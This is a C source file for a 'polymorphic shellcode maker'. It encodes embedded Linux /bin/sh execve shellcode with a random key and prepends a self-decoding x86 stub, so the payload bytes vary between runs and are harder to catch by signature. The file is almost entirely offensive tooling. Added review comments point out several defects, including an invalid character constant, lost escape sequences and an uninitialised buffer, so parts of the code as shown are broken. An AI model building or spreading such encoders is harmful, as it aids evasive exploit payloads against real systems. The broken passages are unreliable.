/*
A polymorphic shellcode maker
original program created by Rizki Wicaksono (http://www.ilmuhacking.com)
I added some functions to make it more interesting:
"sub" and "add" operations alongside the original xor in the decoder

otoy(http://otoyrood.wordpress.com)
0x82010
*/

#include <sys/time.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

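/*
 * Return random() reduced modulo quo.
 *
 * The generator is re-seeded on every call from the current wall-clock
 * time (seconds + microseconds). That seed is predictable, so the value
 * must not be treated as a secret or as cryptographic-quality randomness.
 *
 * quo: modulus. A value of 0 would make the '%' below undefined behaviour
 *      (typically a SIGFPE), so it is answered with 0 instead.
 *
 * Returns the remainder of random() divided by quo, or 0 when quo is 0.
 */
int getnumber(int quo) {
    struct timeval tm;

    /* Guard the modulo: random() % 0 is undefined. */
    if (quo == 0) {
        return 0;
    }

    gettimeofday(&tm, NULL);
    /* Same seed expression as before: seconds plus microseconds, truncated. */
    srandom((unsigned int)(tm.tv_sec + tm.tv_usec));
    return (int)(random() % quo);
}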

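/*
 * Print the NUL-terminated byte string `data` on stdout as a C string
 * literal made of \xNN escapes, 15 bytes per output line, followed by
 * ";" and a blank line.
 *
 * The printf format strings on the page had lost their backslashes
 * (the code did not compile as shown); they are restored here to the
 * quote / newline / "\x" forms that the surrounding logic implies.
 *
 * data: bytes to dump. The length is taken with strlen(), so output
 *       stops at the first zero byte.
 */
void print_code(char *data) {
    const unsigned char *bytes = (const unsigned char *)data;
    size_t len = strlen(data);  /* measured once instead of per iteration */
    size_t col = 0;             /* bytes already printed on this line */

    /* Open the literal up front so that empty input still prints a balanced "". */
    printf("\"");
    for (size_t i = 0; i < len; ++i) {
        if (col >= 15) {
            /* Close this line's literal and open the next one. */
            printf("\"\n\"");
            col = 0;
        }
        printf("\\x%02x", bytes[i]);
        ++col;
    }
    printf("\";\n\n");
}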

/*
 * Entry point: transforms the embedded payload bytes with a single-byte
 * key (subtract, xor, add, in that order), patches the key and payload
 * length into a fixed decoder template, concatenates template + payload
 * and prints the result through print_code().
 *
 * Review notes for readers analysing the output of this tool:
 *  - Only offsets 6, 9, 12 and 15 of the template vary between runs
 *    (length and key); every other template byte is constant, and
 *    offsets 8 and 14 are always set to the same two values. The stub
 *    is therefore a stable byte pattern that a signature can match.
 *  - The key comes from getnumber(), which is seeded from the clock.
 */
int main() {
char shellcode[] =
/* "/bin/sh" shellcode*/
/* put our own shellcode here */
"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80";

int count;
/* Initial key in 0..199; 0 is a possible value. */
int number = getnumber(200);
int badchar = 0;
int ldecoder;
/* strlen() stops at the first zero byte of the payload. */
int lshellcode = strlen(shellcode);
char *result;

/* Decoder template; the 0x00 bytes at offsets 6, 9, 12 and 15 are placeholders filled in below. */
char decoder[] =
"\xeb\x13\x5e\x31\xc9\xb1\x00\x80\x06\x00\x80\x36\x00\x80\x2e"
"\x00\x46\xe2\xf4\xeb\x05\xe8\xe8\xff\xff\xff";
/* Length is stored in one char, so a payload longer than 255 bytes is truncated here. */
decoder[6] = lshellcode;
decoder[9] = number;
decoder[12]= number;
decoder[15]= number;

/* NOTE(review): if number is 0 the template now holds a zero byte at offset 9 and this strlen() reports a shortened length. */
ldecoder = strlen(decoder);

do {
/* A previous pass produced a flagged byte: choose a new key in 0..9 and re-patch the template. */
if(badchar == 1) {
number = getnumber(10);
decoder[9] = number;
decoder[12]= number;
decoder[15]= number;

badchar = 0;
/* NOTE(review): the trailing "n" looks like a newline escape that lost its backslash in extraction - confirm. */
printf("New Key: %2xn", number);
}
/* The buffer is transformed in place, so a retry operates on bytes already transformed by the earlier key. */
for(count=0; count < lshellcode; count++) {
shellcode[count] = shellcode[count] - number;
shellcode[count] = shellcode[count] ^ number;
shellcode[count] = shellcode[count] + number;
/* NOTE(review): '' is not a valid character constant; presumably '\0' with the escape lost in extraction - confirm. */
if(shellcode[count] == '') {
badchar = 1;
}
}
} while(badchar == 1);
/* Swap the template's values at offsets 8 and 14 (0x06 and 0x2e in the literal above). */
decoder[8] = 46;
decoder[14] = 6;
/*
 * NOTE(review): the malloc() result is not checked, the buffer is not
 * initialised before the first strcat() (which searches it for a
 * terminator - undefined behaviour), and the size leaves no room for
 * the terminating NUL. The buffer is never freed.
 */
result = malloc(lshellcode + ldecoder);
strcat(result,decoder);
strcat(result,shellcode);

/* NOTE(review): same apparent lost "\n" escape as in the "New Key" message above. */
printf("Key: %02xn",number);
print_code(result);
}